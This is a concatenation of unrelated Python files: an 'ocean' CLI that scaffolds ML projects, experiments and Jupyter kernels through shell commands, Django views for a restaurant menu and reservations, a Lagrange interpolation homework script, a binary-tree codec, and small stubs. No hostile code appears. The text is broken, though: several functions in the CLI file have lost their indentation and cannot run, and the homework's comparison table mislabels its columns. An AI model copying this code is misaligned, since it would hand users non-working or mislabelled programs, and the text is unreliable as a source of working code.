    def do_start_episode(self, episode: int) -> bool:
        # Keep playing while the episode counter stays within the budget.
        return not episode > self._num_episodes

    def initialize(self, manifest: Manifest):
        self._manifest = manifest

    def act(self, state):
        # The state is ignored: draw a random action from the definition.
        return self._manifest.actions_definition.random()
if __name__ == '__main__':
    # Train a random-acting agent for 10 episodes with verbose output.
    agent = RandomAlgorithm(10)
    Runner(agent, verbose=1).train()
|
from .docs_index_generator import make_doc_index
from .log_generator import parse_md, generate_log
from bs4 import BeautifulSoup
from distutils.dir_util import copy_tree
from jinja2 import Template
from glob import glob
import janus
import mistune
import os
import re
import sys
import shutil
def parse():
    """Build the janus CLI parser (project/exp/env/log/docs) and dispatch.

    Each new_cmd() registers a subcommand with its callback; the trailing
    parser.parse() call routes argv to the matching *_command function.
    """
    parser = janus.ArgParser()
    # ===== PROJECT =====
    project_parser = parser.new_cmd('project',
                                    'Project command',
                                    project_command)
    new_project_parser = project_parser.new_cmd('new',
                                                'Creates new project',
                                                project_new_command)
    new_project_parser.new_str('n name')
    new_project_parser.new_str('v version', fallback='0.0.1')
    new_project_parser.new_str('a author', fallback='Surf')
    new_project_parser.new_str('l licence', fallback='MIT')
    new_project_parser.new_str('d description', fallback='')
    new_project_parser.new_str('p path', fallback='.')
    # ===== EXPERIMENT =====
    experiment_parser = parser.new_cmd('exp',
                                       'Experiment command',
                                       experiment_command)
    new_exp_parser = experiment_parser.new_cmd('new',
                                               'Creates new experiment',
                                               new_experiment_command)
    new_exp_parser.new_str('n name')
    new_exp_parser.new_str('a author')
    new_exp_parser.new_str('t task', fallback='')
    new_exp_parser.new_str('p path', fallback='.')
    list_exp_parser = experiment_parser.new_cmd('list',
                                                'List all experiments',
                                                list_experiments_command)
    list_exp_parser.new_str('p path', fallback='.')
    # -a/-t are booleans here: they toggle author/task in the listing.
    list_exp_parser.new_flag('a author')
    list_exp_parser.new_flag('t task')
    # ===== ENVIRONMENTS =====
    env_parser = parser.new_cmd('env',
                                'Environment command',
                                env_command)
    new_env_parser = env_parser.new_cmd('new',
                                        'Creates new environment',
                                        create_env_command)
    new_env_parser.new_str('n name', fallback='')
    new_env_parser.new_str('p path', fallback='.')
    env_parser.new_cmd('list',
                       'Shows kernels environment',
                       show_env_command)
    delete_env_parser = env_parser.new_cmd('delete',
                                           'Delete current environment',
                                           delete_env_command)
    delete_env_parser.new_str('n name', fallback='')
    delete_env_parser.new_str('p path', fallback='.')
    # ===== LOG =====
    log_parser = parser.new_cmd('log',
                                'Log command',
                                log_command)
    new_log_parser = log_parser.new_cmd('new',
                                        'Creates new project log',
                                        create_log_command)
    new_log_parser.new_str('p path', fallback='.')
    archive_log_parser = log_parser.new_cmd('archive',
                                            'Archives log',
                                            arch_log_command)
    archive_log_parser.new_str('n name', fallback='')
    archive_log_parser.new_str('p path', fallback='.')
    # -w is the archive password; empty string means "no password".
    archive_log_parser.new_str('w password', fallback='')
    # ===== DOC =====
    doc_parser = parser.new_cmd('docs',
                                'Docs command',
                                doc_command)
    doc_parser.new_str('p path', fallback='.')
    # # # END # # #
    parser.parse()
# =====================================================================
def project_command(p):
    """Top-level `project` command: print usage unless a subcommand ran."""
    if p.has_cmd():
        # A subcommand (e.g. `new`) was supplied; janus dispatches it itself.
        return
    help_lines = [
        'PROJECT COMMAND HELP',
        'Usage:',
        ' > ocean project new ...',
        ' -n --name : Project name like "Cute kittens". Must be provided.',
        ' -v --version : Version. Default: "0.0.1".',
        ' -a --author : Author. Default: "Surf".',
        ' -l --licence : License. Default: "MIT".',
        ' -d --description : Description. Default: "".',
        ' -p --path : Path. Default: ".", which is the current directory.',
    ]
    print('\n'.join(help_lines))
def project_new_command(p):
    """Handle `ocean project new`: scaffold a project from the template."""
    # Collapse the human-readable name into lowerCamelCase,
    # e.g. "Cute kittens" -> "cuteKittens".
    camel = ''.join(_capitalizeOne(word) for word in p['name'].split())
    camel = camel[0].lower() + camel[1:]
    create_project(name=p['name'],
                   short_name=camel,
                   author=p['author'],
                   description=p['description'],
                   version=p['version'],
                   licence=p['licence'],
                   path=os.path.abspath(p['path']))
def experiment_command(p):
    """Top-level `exp` command: print usage unless a subcommand ran."""
    if p.has_cmd():
        return
    help_lines = [
        'EXPERIMENT COMMAND HELP',
        'Usage:',
        ' > ocean exp new ... - Creates new experiment',
        ' -n --name : Experiment name like "Boosting". Must be provided.',
        ' -a --author : Author. Must be provided',
        (' -t --task : Task of an experiment. Default: "", so '
         'the one can specify it later on.'),
        (' -p --path : Path to the root folder, default is . (current folder). '
         'Ocean performs search of an root folder automatically, so '
         'you can perform this command in any nested folder.'),
        ' > ocean exp list - List all experiments',
    ]
    print('\n'.join(help_lines))
def new_experiment_command(p):
    """Handle `ocean exp new`: scaffold a numbered experiment folder.

    Creates `experiments/exp-NNN-CamelName` from the bundled template and
    renders its `log.md` and `scripts/train.py` with the experiment metadata.
    """
    name = p['name']
    if name is None:
        print(('Experiment name must be provided. '
               'Use "ocean exp new -n EXP_NAME -a AUTHOR" syntax'),
              file=sys.stderr)
        return
    camel_name = _to_camel(name)
    author = p['author']
    if author is None:
        print(('Author name must be provided. Use "ocean exp new '
               '-n EXP_NAME -a AUTHOR" syntax'),
              file=sys.stderr)
        return
    task = p['task']
    if task == '':
        task = 'Describe your task here.'
    root = _sanitize_project_path(p)
    if not root:
        return
    exps = os.path.join(root, 'experiments')
    # os.path.basename instead of split('/') so Windows paths work too.
    project_name = os.path.basename(root)
    exps_created = sorted(glob(os.path.join(exps, '*')))
    # Folder names look like "exp-NNN-CamelName"; strip "exp-NNN-" to get
    # the stored (camel-cased) experiment names.
    used_names = [x.split('-', 2)[-1] for x in exps_created]
    # BUG FIX: the original tested `name is used_names` (identity against the
    # list object, always False). Uniqueness must be a membership test, and
    # against the camel-cased form, since that is what the folders store.
    if camel_name in used_names:
        print('Experiment name must be unique!', file=sys.stderr)
        return
    # Next free experiment number, zero-padded to three digits.
    if len(exps_created) == 0:
        number = 1
    else:
        number = max(int(x.split('-')[1]) for x in exps_created) + 1
    exp_folder_name = 'exp-{0}-{1}'.format(str(number).zfill(3), camel_name)
    from_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
                             'exp-{{expNumber}}-{{expName}}')
    to_path = os.path.join(exps, exp_folder_name)
    copy_tree(from_path, to_path)
    # Render the experiment log with its metadata (shared helper does the
    # read/render/write cycle the original inlined here).
    _render_file_inplace(path=os.path.join(to_path, 'log.md'),
                         replace_dict={'expNumber': number,
                                       'expName': name,
                                       'author': author,
                                       'task': task})
    # Point the training-script template at this project's package.
    _render_file_inplace(path=os.path.join(to_path, 'scripts/train.py'),
                         replace_dict={'projectNameShort': project_name})
def list_experiments_command(p):
    """Handle `ocean exp list`: print each experiment, optionally with metadata."""
    root = _sanitize_project_path(p)
    if not root:
        return
    show_authors = p['author']
    show_tasks = p['task']
    exps_dir = os.path.join(root, 'experiments')
    if not os.path.exists(exps_dir):
        print('Haven\'t found the experiments folder in project\'s root',
              file=sys.stderr)
        return
    parsed = [_parse_experiment(folder, show_authors, show_tasks)
              for folder in sorted(glob(os.path.join(exps_dir, '*')))]
    for info in parsed:
        print(info['exp_name'])
        if show_authors:
            print('\tAuthor: {}'.format(info['author']))
        if show_tasks:
            print('\tTask: {}'.format(info['task']))
        if show_authors or show_tasks:
            # Blank separator line between experiments in verbose mode.
            print()
def _parse_experiment(folder, show_authors, show_tasks):
    """Extract name (and optionally author/task) from a folder's log.md."""
    md = parse_md(os.path.join(folder, 'log.md'))
    # The first-level heading is the experiment name; the "Author"/"Task"
    # sections hold their values in the paragraph right after the heading.
    info = {'exp_name': md.select_one('h1').text}
    if show_authors:
        info['author'] = md.find('h2', text='Author').find_next('p').text
    if show_tasks:
        info['task'] = md.find('h2', text='Task').find_next('p').text
    return info
def env_command(p):
    """Top-level `env` command: print usage unless a subcommand ran."""
    if p.has_cmd():
        return
    help_lines = [
        'ENVIRONMENT COMMAND HELP',
        'Usage:',
        ' > ocean env new ... - Creates new venv and relative Jupyter kernel for the experiment',
        (' -n --name : Environment name like "Doggie". '
         'If not specified, experiment folder\'s name will be taken.'),
        (' -p --path : Path to the experiment folder, default is . (current folder). '
         'Ocean performs search of an experiment\'s root folder automatically, so '
         'you can perform this command in any nested folder.'),
        ' > ocean env show - Shows list of all environments.',
        (' > ocean env delete - Delete current environment. '
         'Additional parameters are same with `new` command'),
    ]
    print('\n'.join(help_lines))
def create_env_command(p):
    """Handle `ocean env new`: make a venv + Jupyter kernel for an experiment."""
    exp_root = _sanitize_exp_path(p)
    if not exp_root:
        return
    _create_kernel(exp_root, p['name'])
def show_env_command(p):
    """Handle `ocean env list`: print the installed Jupyter kernelspecs."""
    # Delegates to jupyter; its output goes straight to the console.
    os.system('jupyter kernelspec list')
def delete_env_command(p):
    """Handle `ocean env delete`: remove an experiment's venv and kernel."""
    exp_root = _sanitize_exp_path(p)
    if not exp_root:
        return
    _remove_kernel(exp_root, p['name'])
def doc_command(p):
    """Handle `ocean docs`: rebuild the project's Sphinx documentation."""
    root = _sanitize_project_path(p)
    if root:
        _generate_docs(root)
def log_command(p):
    """Top-level `log` command: print usage unless a subcommand ran."""
    if p.has_cmd():
        return
    help_lines = [
        'LOG COMMAND HELP',
        'Usage:',
        ' > ocean log new - Creates project log',
        ' > ocean log archive ... - Archives existing project log',
        ' -n --name : Name of the archive like "result". Must be provided.',
        ' -p --password : Password. Default is "" - no password.',
    ]
    print('\n'.join(help_lines))
def create_log_command(p):
    """Handle `ocean log new`: generate the project log."""
    root = _sanitize_project_path(p)
    if root is not None:
        generate_log(root)
def arch_log_command(p):
    """Handle `ocean log archive`: zip the project_log folder.

    Optionally protects the archive with a password (-w) and names it (-n);
    otherwise the archive is named after the project folder.
    """
    import shlex  # local import: only needed here, for safe shell quoting

    root = _sanitize_project_path(p)
    if root is None:
        return
    password = p['password']
    name = p['name']
    cmds = ['zip']
    # SECURITY FIX: quote user-supplied values so spaces and shell
    # metacharacters cannot break out of (or inject into) the command.
    if password != '':
        cmds.append('-P {}'.format(shlex.quote(password)))
    if name != '':
        cmds.append('-r {}.zip'.format(shlex.quote(name)))
    else:
        # os.path.basename instead of split('/') for portability.
        cmds.append('-r {}.zip'.format(shlex.quote(os.path.basename(root))))
    cmds.append(shlex.quote(os.path.join(root, 'project_log')))
    cmd = ' '.join(cmds)
    print(cmd)
    os.system(cmd)
# =====================================================================
def create_project(name, short_name, author, description,
                   version, licence, path):
    """Scaffold a complete Ocean project under `path`/`short_name`.

    Copies the bundled template, renders README.md and setup.py, renames
    the templated source package, generates and builds the Sphinx docs,
    and finally installs the new package.
    """
    # 1. Copying template itself and renaming the root
    root = _copy_template(path, short_name)
    # 2. Readme
    _render_readme(root, name, author, description)
    # 3. Setup
    _render_setup_py(root, short_name, version, description, author, licence)
    # 4. Source folder
    _rename_src_folder(root, short_name)
    # 5. Documentation
    docs_dir = _generate_sphinx_docs(root, name, author, version)
    # 6. Documentation's configuration
    _change_sphinx_config(docs_dir)
    # 7. Generate docs
    _generate_docs(root)
    # 8. Install project package by default
    _install_as_package(root)
def _copy_template(path, short_name):
    """Copy the bundled project template into `path`/`short_name`; return it."""
    # The template ships next to this module, in a literally-named
    # "{{projectNameShort}}" directory.
    template_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),
                                '{{projectNameShort}}')
    destination = os.path.join(path, short_name)
    copy_tree(template_dir, destination)
    return destination
def _render_readme(root, name, author, description):
    """Fill the template placeholders in the project's README.md."""
    context = {
        'projectName': name,
        'author': author,
        'projectDescription': description,
    }
    _render_file_inplace(path=os.path.join(root, 'README.md'),
                         replace_dict=context)
def _render_setup_py(root, short_name, version, description, author, licence):
    """Fill the template placeholders in the project's setup.py."""
    context = {
        'projectNameShort': short_name,
        'version': version,
        'projectDescriptionShort': description,
        'author': author,
        'licence': licence,
    }
    _render_file_inplace(path=os.path.join(root, 'setup.py'),
                         replace_dict=context)
def _rename_src_folder(root, short_name):
src_dir_from = os.path.join(root, '{{projectNameShort}}')
src_dir_to = os.path.join(root, short_name)
shutil.move(src_dir_from, src_dir_to)
def _generate_sphinx_docs(root, name, author, version):
docs_dir = os.path.join(root, 'docs')
command = ('cd {0} && '
'sphinx-apidoc -o . .. -FEP -H "{1}" -A "{2}" -V "{3}" '
'>/dev/null')\
.format(docs_dir, name, author, version)
os.system(command)
return docs_dir
def _change_sphinx_config(docs_dir):
new_config = []
project_name = None
to_find = ['import os', 'import sys', 'sys.path.insert']
to_append = ['import os\n', 'import sys\n', 'sys.path.insert(0, "..")\n']
conf_file_path = os.path.join(docs_dir, 'conf.py')
if not os.path.exists(conf_file_path):
print('`sphinx apidoc` failed, check sphinx installaton')
return
with open(conf_file_path) as f:
config = f.readlines()
for line in config:
found = False
for i in range(len(to_find)):
if to_find[i] in line:
found = True
new_config.append(to_append[i])
break
if not found:
new_config.append(line)
capts = re.findall(r'project\s+\=\s+\'(.+)\'', line, flags=re.I)
if len(capts) > 0:
project_name = capts[0]
new_config.append('autodoc_mock_imports = ["yaml", "numpy", "pandas"]\n')
new_config.append(('exclude_patterns = '
'["setup.rst", "{0}.rst", "{0}.data.rst"]\n').format(project_name))
with open(os.path.join(docs_dir, 'conf.py'), 'w') as f:
f.write(''.join(new_config))
def _generate_docs(root):
    """Regenerate index.rst and build the HTML docs for the project."""
    docs = os.path.join(root, 'docs')
    index_rst = os.path.join(docs, 'index.rst')
    if not os.path.exists(index_rst):
        # sphinx-apidoc never produced a skeleton; nothing to build.
        print('`sphinx apidoc` failed, check sphinx installaton')
        return
    make_doc_index(root_path=root, doc_index_path=index_rst)
    os.system('cd {} && make html >/dev/null'.format(docs))
def _install_as_package(root):
    """Install the scaffolded project via its Makefile `package` target."""
    os.system('cd {0}; make -B package >/dev/null'.format(root))
def _name_for_the_kernel(path, name):
    """Derive the Jupyter kernel name for the experiment at `path`.

    The kernel name is "<project>_<name>" when `path` lies inside an Ocean
    project, otherwise just `name`; an empty `name` falls back to the
    experiment folder's own name.

    Returns (kernel_name, absolute_experiment_path).
    """
    full_foldername = os.path.abspath(path)
    found, root_path = _find_ocean_root(full_foldername)
    if found:
        # Prefix with the project folder name so kernels from different
        # projects cannot collide. os.path.basename replaces the original
        # split('/')[-1] so Windows paths are handled too.
        prefix = '{}_'.format(os.path.basename(root_path))
    else:
        prefix = ''
    folder = os.path.basename(full_foldername)
    name = folder if name == '' else name
    return prefix + name, full_foldername
def _create_kernel(f, name=''):
    """Create a project virtualenv and register it as a Jupyter kernel.

    NOTE(review): the command uses ``source``, a bashism — ``os.system``
    runs ``sh``, which may not support it on all platforms; confirm.
    """
    name, full_foldername = _name_for_the_kernel(f, name)
    steps = (
        'cd {0}',
        'python3 -m venv env',
        'source env/bin/activate',
        'pip install ipykernel',
        'python -m ipykernel install --user --name "{1}" --display-name "Python ({1})"',
        'pip install -r requirements.txt',
        'deactivate',
    )
    os.system(' && '.join(steps).format(full_foldername, name))
def _remove_kernel(f, name=''):
    """Unregister the project's Jupyter kernel and delete its virtualenv.

    NOTE(review): ``rm -rf env`` runs in the *current* working directory,
    not in *f* — confirm callers cd into the project first.
    """
    name, _ = _name_for_the_kernel(f, name)
    cmd = 'jupyter kernelspec uninstall "{0}" -f && rm -rf env'.format(name.lower())
    os.system(cmd)
# =============================================================================
def _capitalizeOne(s):
return s[0].upper() + s[1:]
def _render_file_inplace(path, replace_dict):
    """Render the template file at *path* in place.

    Reads the file, treats it as a template, substitutes *replace_dict*,
    and overwrites the original file with the rendered text.
    """
    with open(path) as src:
        rendered = Template(src.read()).render(**replace_dict)
    with open(path, 'w') as dst:
        dst.write(rendered)
def _find_ocean_root(path):
    """Return (found, root) for the nearest ancestor holding a '.ocean' marker."""
    return _find_root(path, '.ocean')
def _find_experiment_root(path):
    """Return (found, root) for the nearest ancestor holding a '.exp' marker."""
    return _find_root(path, '.exp')
def _find_root(path, hidden):
root = None
found = False
old_f = os.path.abspath(path)
f = os.path.dirname(old_f)
while f != old_f:
hidden_path = os.path.join(old_f, hidden)
if os.path.exists(hidden_path):
found = True
root = old_f
break
old_f = f
f = os.path.dirname(f)
return found, root
def _to_camel(s):
return ''.join(x[0].upper()+x[1:] for x in s.split())
def _sanitize_project_path(p):
    """Resolve the ocean project root from the CLI params dict *p*.

    Returns the root path, or None (after a stderr hint) when *p['path']*
    is not inside an ocean project.
    """
    found, root = _find_ocean_root(p['path'])
    if found:
        return root
    print('Please specify project path via -p argument', file=sys.stderr)
    return
def _sanitize_exp_path(p):
    """Resolve the experiment root from the CLI params dict *p*.

    Returns the experiment root, or None (after a stderr hint) when
    *p['path']* is not inside an experiment folder.
    """
    found, exp_root = _find_experiment_root(p['path'])
    if found:
        return exp_root
    print('Please specify project path via -p argument', file=sys.stderr)
    return
# =============================================================================
if __name__ == '__main__':
    # Entry point: delegate to the CLI argument parser/dispatcher.
    parse()
|
from django.shortcuts import render, redirect
from django.views.generic.edit import CreateView
from django.contrib import messages
from project.models import MenuItem, Feedback
from cart.forms import CartAddProductForm
from resto.forms import ReservationForm, ContactForm
from django.views.decorators.csrf import csrf_exempt
from django.core.paginator import Paginator
from utils import send_sms
from webpush import send_group_notification
def home(request):
    """Landing page: full menu grouped by category plus the 3 latest feedbacks."""
    feedback = Feedback.objects.order_by('-date')[:3]
    # (template context key, MenuItem.category value) pairs.  The keys are
    # what index.html expects, so they must not change.
    categories = [
        ('Soepen', 'Soepen'),
        ('Voorgerechten', 'Voorgerechten'),
        ('Momo_gerechten', 'Momo gerechten'),
        ('Noodle_gerechten', 'Noodle gerechten'),
        ('Tandoori_gerechten', 'Tandoori gerechten'),
        ('Kipgerechten', 'Kipgerechten'),
        ('Lamsgerechten', 'Lamsgerechten'),
        ('Zeevruchten_gerechten', 'Zeevruchten gerechten'),
        ('Vegetarische_gerechten', 'Vegetarische gerechten'),
        ('Biryani_gerechten', 'Biryani gerechten'),
        ('Extra', "Extra's"),
        ('Indiaas_brood', 'Indiaas brood'),
        ('Nagerechten', 'Nagerechten'),
        ('Dranken', 'Dranken'),
    ]
    # One lazily-evaluated queryset per category replaces the original 14
    # hand-written filter lines.
    context = {key: MenuItem.objects.filter(category=cat) for key, cat in categories}
    context['item'] = MenuItem.objects.all()
    context['feedback'] = feedback
    return render(request, "index.html", context)
def menu1(request):
    """Home-delivery menu page, grouped by category, with an add-to-cart form."""
    # (template context key, MenuItem.category value) pairs expected by menu1.html.
    categories = [
        ('Soepen', 'Soepen'),
        ('Voorgerechten', 'Voorgerechten'),
        ('Momo_gerechten', 'Momo gerechten'),
        ('Noodle_gerechten', 'Noodle gerechten'),
        ('Tandoori_gerechten', 'Tandoori gerechten'),
        ('Kipgerechten', 'Kipgerechten'),
        ('Lamsgerechten', 'Lamsgerechten'),
        ('Zeevruchten_gerechten', 'Zeevruchten gerechten'),
        ('Vegetarische_gerechten', 'Vegetarische gerechten'),
        ('Biryani_gerechten', 'Biryani gerechten'),
        ('Extra', "Extra's"),
        ('Indiaas_brood', 'Indiaas brood'),
        ('Nagerechten', 'Nagerechten'),
        ('Dranken', 'Dranken'),
    ]
    context = {
        key: MenuItem.objects.filter(Menu_type="Home Delivery", category=cat)
        for key, cat in categories
    }
    context['item'] = MenuItem.objects.filter(Menu_type="Home Delivery")
    context['cart_product_form'] = CartAddProductForm()
    return render(request, "menu1.html", context)
def menu3(request):
    """Takeaway menu page (includes the extra 'Nepali Menu' category)."""
    # (template context key, MenuItem.category value) pairs expected by menu3.html.
    categories = [
        ('Soepen', 'Soepen'),
        ('Nepali_menu', 'Nepali Menu'),
        ('Voorgerechten', 'Voorgerechten'),
        ('Momo_gerechten', 'Momo gerechten'),
        ('Noodle_gerechten', 'Noodle gerechten'),
        ('Tandoori_gerechten', 'Tandoori gerechten'),
        ('Kipgerechten', 'Kipgerechten'),
        ('Lamsgerechten', 'Lamsgerechten'),
        ('Zeevruchten_gerechten', 'Zeevruchten gerechten'),
        ('Vegetarische_gerechten', 'Vegetarische gerechten'),
        ('Biryani_gerechten', 'Biryani gerechten'),
        ('Extra', "Extra's"),
        ('Indiaas_brood', 'Indiaas brood'),
        ('Nagerechten', 'Nagerechten'),
        ('Dranken', 'Dranken'),
    ]
    context = {
        key: MenuItem.objects.filter(Menu_type="Takeaway", category=cat)
        for key, cat in categories
    }
    context['item'] = MenuItem.objects.filter(Menu_type="Takeaway")
    context['cart_product_form'] = CartAddProductForm()
    return render(request, "menu3.html", context)
def menu2(request):
    """Second home-delivery menu page.

    NOTE(review): queries are identical to menu1 — only the rendered
    template differs; confirm whether both views are really needed.
    """
    # (template context key, MenuItem.category value) pairs expected by menu2.html.
    categories = [
        ('Soepen', 'Soepen'),
        ('Voorgerechten', 'Voorgerechten'),
        ('Momo_gerechten', 'Momo gerechten'),
        ('Noodle_gerechten', 'Noodle gerechten'),
        ('Tandoori_gerechten', 'Tandoori gerechten'),
        ('Kipgerechten', 'Kipgerechten'),
        ('Lamsgerechten', 'Lamsgerechten'),
        ('Zeevruchten_gerechten', 'Zeevruchten gerechten'),
        ('Vegetarische_gerechten', 'Vegetarische gerechten'),
        ('Biryani_gerechten', 'Biryani gerechten'),
        ('Extra', "Extra's"),
        ('Indiaas_brood', 'Indiaas brood'),
        ('Nagerechten', 'Nagerechten'),
        ('Dranken', 'Dranken'),
    ]
    context = {
        key: MenuItem.objects.filter(Menu_type="Home Delivery", category=cat)
        for key, cat in categories
    }
    context['item'] = MenuItem.objects.filter(Menu_type="Home Delivery")
    context['cart_product_form'] = CartAddProductForm()
    return render(request, "menu2.html", context)
class NewReservation(CreateView):
    """Create a table reservation and redirect to the thank-you page."""
    template_name = "reservation.html"
    form_class = ReservationForm

    # NOTE(review): @csrf_exempt on a CBV *method* does not exempt the view
    # from CSRF checks — it must be applied to dispatch() via
    # method_decorator (or to the as_view() result). Kept as-is to preserve
    # current behaviour; confirm the intent.
    @csrf_exempt
    def form_valid(self, form):
        # Persist the reservation.  commit=False is kept in case related
        # objects need attaching before the final save.
        # (Removed the unused name/people/time/date/user locals.)
        reservation = form.save(commit=False)
        reservation.save()
        # Flash a confirmation message to the user.
        messages.success(
            self.request,
            "you have successfully booked a new table confirm your by paying for the table ")
        # Redirect the user to the thank-you page.
        return redirect("/thanks")
class Contact(CreateView):
    """Contact-form page: saves the message and redirects back to the form."""
    template_name = "contact.html"
    form_class = ContactForm

    def form_valid(self, form):
        # Persist the contact message.
        contact_message = form.save(commit=False)
        contact_message.save()
        # Flash a confirmation to the user, then return to the contact page.
        messages.success(
            self.request,
            "your message was sent successfully")
        return redirect("/contact")
@csrf_exempt
def thankyou(request):
    """Post-payment confirmation page.

    NOTE(review): this view renders 'payment_done.html' while thanks()
    below renders 'thankyou.html' — the template names look swapped
    relative to the view names; confirm against the URL conf.
    """
    return render(request, 'payment_done.html')


@csrf_exempt
def thanks(request):
    """Reservation thank-you page."""
    return render(request, 'thankyou.html')


@csrf_exempt
def sorry(request):
    """Failure / apology page."""
    return render(request, 'sorry.html')


@csrf_exempt
def soon(request):
    """'Coming soon' placeholder page."""
    return render(request, 'soon.html')


def payment(request):
    """Payment page (note: not CSRF-exempt, unlike the views above)."""
    return render(request, "payment.html")
|
from sympy import *
from sympy import simplify
from scipy.interpolate import lagrange
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#2a
def lang(x_i, y_i):
    """Build the Lagrange interpolating polynomial through (x_i, y_i).

    Constructs the polynomial symbolically with sympy, simplifies it, and
    returns a numpy-callable ``f(x)``.

    Raises ValueError when the coordinate lists differ in length.  (The
    original *returned* an error string instead of raising, which a caller
    could mistakenly try to call as the interpolant.)
    """
    if len(x_i) != len(y_i):
        raise ValueError("len(x_i) should be equal to len(y_i)")
    x = symbols('x')
    yp = 0
    for i in range(len(x_i)):
        # Lagrange basis polynomial l_i(x): 1 at x_i[i], 0 at every other node.
        p = 1
        for j in range(len(x_i)):
            if j != i:
                p *= (x - x_i[j]) / (x_i[i] - x_i[j])
        yp += y_i[i] * p
    p_x = simplify(yp)
    return lambdify(x, p_x, modules=['numpy'])
#2b
def in_lang(x_i,y_i):
    """Inverse interpolation: interpolate x as a function of y by swapping axes."""
    return lang(y_i,x_i)
#2c
def inbuilt(x_i, y_i, x1):
    """Evaluate scipy's built-in Lagrange interpolant of (x_i, y_i) at x1."""
    interpolant = lagrange(x_i, y_i)
    return interpolant(x1)
#Graph
def graph1(x_i, y_i, arr_x, arr_y_f, arr_y_in, pt_x, pt_y, xlab, ylab, titl):
    """Plot the data points, the interpolated point, and both interpolants.

    Draws the given discrete points and the interpolated point as scatter
    markers, then overlays scipy's interpolant and the hand-built one.
    (Plot order is kept so legend/z-order are unchanged.)
    """
    plt.scatter(x_i, y_i, marker='*', c="red", label="Given discrete points")
    plt.scatter(pt_x, pt_y, marker='o', c='black', label="Interpolated point")
    plt.plot(arr_x, arr_y_in, c='blue', label="Scipy's Inbuilt function", linestyle="-.")
    plt.plot(arr_x, arr_y_f, c="green", label="Interpolated langrange function")
    # Axis decoration.
    plt.title(titl)
    plt.xlabel(xlab)
    plt.ylabel(ylab)
    plt.grid(True)
    plt.legend()
    plt.show()
#3a
# Bessel-function samples: a = beta values, b = J0(beta) values.
a=[0.00,0.2,0.4,0.6,0.8,1,1.2,1.4,1.6,1.8,2.0,2.2,2.4,2.6,2.8,3.0]
b=[1,0.99,0.96,0.91,0.85,0.76,0.67,0.57,0.46,0.34,0.22,0.11,0.00,-0.1,-0.18,-0.26]
# g(beta) ~ J0(beta); k(J0) ~ beta (inverse interpolation).
g=lang(a,b)
k=in_lang(a,b)
arr_beta=np.linspace(0,3,1000)
arr_Jbeta_f=[]
arr_Jbeta_i=[]
for i in arr_beta:
    arr_Jbeta_f.append(g(i))
    arr_Jbeta_i.append(inbuilt(a,b,i))
arr_Jbeta=np.linspace(1,-0.26,1000)
arr_beta_f=[]
arr_beta_i=[]
for i in arr_Jbeta:
    arr_beta_f.append(k(i))
    arr_beta_i.append(inbuilt(b,a,i))
# NOTE(review): the message text says "beta = 0.5" but evaluates g(2.3);
# likewise the next line says "2.3" but evaluates k(0.5) — text and values
# look swapped; confirm before fixing the strings.
print("The value of bessel function for \u03B2 = 0.5 is ",g(2.3))
print("The value of \u03B2 for which the value of bessel function is 2.3 = ",k(0.5))
graph1(a,b,arr_beta,arr_Jbeta_f,arr_Jbeta_i,2.3,g(2.3),"\u03B2","J0_\u03B2","3a. (i) Bessel Function")
graph1(b,a,arr_Jbeta,arr_beta_f,arr_beta_i,0.5,k(0.5),"J0_\u03B2","\u03B2","3a. (ii) Inverse Bessel Function")
#3b
# Photoelectric-effect samples: current I vs voltage V.
I=[2.81,3.24,3.80,4.30,4.37,5.29,6.03]
V=[0.5,1.2,2.1,2.9,3.6,4.5,5.7]
# s(V) ~ I (inverse), z(I) ~ V (forward).
s=in_lang(I,V)
z=lang(I,V)
arr_I=np.linspace(2.81,6.03,1000)
arr_V_f=[]
arr_V_i=[]
for i in arr_I:
    arr_V_f.append(z(i))
    arr_V_i.append(inbuilt(I,V,i))
arr_V=np.linspace(0.5,5.7,1000)
arr_I_f=[]
arr_I_i=[]
for i in arr_V:
    arr_I_f.append(s(i))
    arr_I_i.append(inbuilt(V,I,i))
graph1(I,V,arr_I,arr_V_f,arr_V_i,3.79,z(3.79),"I","V","3b. (i) Photoelectric Effect")
graph1(V,I,arr_V,arr_I_f,arr_I_i,2.4,s(2.4),"V","I","3b. (ii) Inverse Photoelectric effect")
print("The value of I for V= 2.4 is ",s(2.4))
#Comparison
# Tabulate own implementation vs scipy and their difference.
j=["3a (i)","3a (ii)","3b"]
d=[g(2.3),k(0.5),s(2.4)]
c=[inbuilt(a,b,2.3),inbuilt(b,a,0.5),inbuilt(V,I,2.4)]
error=np.array(d)-np.array(c)
print("# Comparison Table")
Data={"Ques":j,"Scipy":d,"My function":c,"Error":error}
print(pd.DataFrame(Data))
|
# -*- coding: utf-8 -*-
# @Author: 何睿
# @Create Date: 2019-02-08 16:23:16
# @Last Modified by: 何睿
# @Last Modified time: 2019-02-08 17:58:28
from collections import deque
# Definition for a binary tree node.
class TreeNode(object):
    """A single binary-tree node: a value plus left/right child links."""

    def __init__(self, x):
        # Children start out absent; callers wire them up afterwards.
        self.val = x
        self.left = self.right = None
class Codec:
    def serialize(self, root):
        """
        Encodes a tree to a single string.
        :type root: TreeNode
        :rtype: str

        Pre-order traversal; tokens are space-separated, absent children are
        recorded as "None", and the string keeps a trailing space (the
        decoder relies on it).
        """
        if not root: return 'None '
        # Accumulate tokens in a list and join once — the original built the
        # string with repeated `+=`, which is quadratic in tree size.
        self._tokens = []
        self.__serialize(root)
        self.res = ''.join(self._tokens)
        return self.res

    def __serialize(self, root):
        # Recursive pre-order traversal, emitting "<val> " per node and
        # "None " at the end of each branch.
        if not root:
            self._tokens.append("None ")
            return
        self._tokens.append(str(root.val) + " ")
        self.__serialize(root.left)
        self.__serialize(root.right)
        return

    def deserialize(self, data):
        """
        Decodes your encoded data to tree.
        :type data: str
        :rtype: TreeNode
        """
        # Drop the trailing space, split on spaces, and feed the tokens
        # through a queue so recursion can consume them left to right.
        _data = deque(data[:-1].split(' '))
        return self.__deserialize(_data)

    def __deserialize(self, data):
        # No tokens left: no node.
        if not data: return None
        # Consume one token from the front of the queue.
        value = data.popleft()
        if value == "None": return None
        root = TreeNode(int(value))
        # Rebuild left subtree, then right subtree (pre-order).
        root.left = self.__deserialize(data)
        root.right = self.__deserialize(data)
        return root
from UE4Parse.BinaryReader import BinaryStream
from UE4Parse.Assets.Objects.FText import FText
class FNavAgentSelectorCustomization:
    """Parsed UE4 ``FNavAgentSelectorCustomization`` struct.

    Reads a single FText property (SupportedDesc) from the binary stream.
    """
    # Localized description text read from the asset.
    SupportedDesc: FText
